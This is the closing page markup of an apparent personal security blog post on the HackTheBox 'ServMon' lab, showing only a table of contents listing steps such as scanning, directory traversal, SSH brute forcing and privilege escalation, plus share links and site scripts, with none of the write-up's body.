      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-Results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap Results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Checking-the-FTP-Service"><span class="toc-number">4.1.</span> <span class="toc-text">Checking the FTP Service</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Checking-the-Web-client"><span class="toc-number">5.1.</span> <span class="toc-text">Checking the Web client</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Directory-Traversal"><span class="toc-number">5.2.</span> <span class="toc-text">Directory Traversal</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Brute-forcing-the-SSH"><span class="toc-number">6.1.</span> <span class="toc-text">Brute forcing the SSH</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-user-txt"><span class="toc-number">6.2.</span> <span class="toc-text">Get user.txt</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Enumerating-directories"><span class="toc-number">7.1.</span> <span class="toc-text">Enumerating directories</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-administrator-password"><span class="toc-number">7.2.</span> <span class="toc-text">Grab administrator password</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NSClient-Web-Server"><span class="toc-number">7.3.</span> <span class="toc-text">NSClient++ Web Server</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-root-flag"><span class="toc-number">7.4.</span> <span class="toc-text">Grab root flag</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&text=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&is_video=false&description=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - ServMon&body=Check out this article: https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&title=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&name=HackTheBox - ServMon&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-06-18/HackTheBox-ServMon/&t=HackTheBox - ServMon" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    InfoSec &#64; medz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
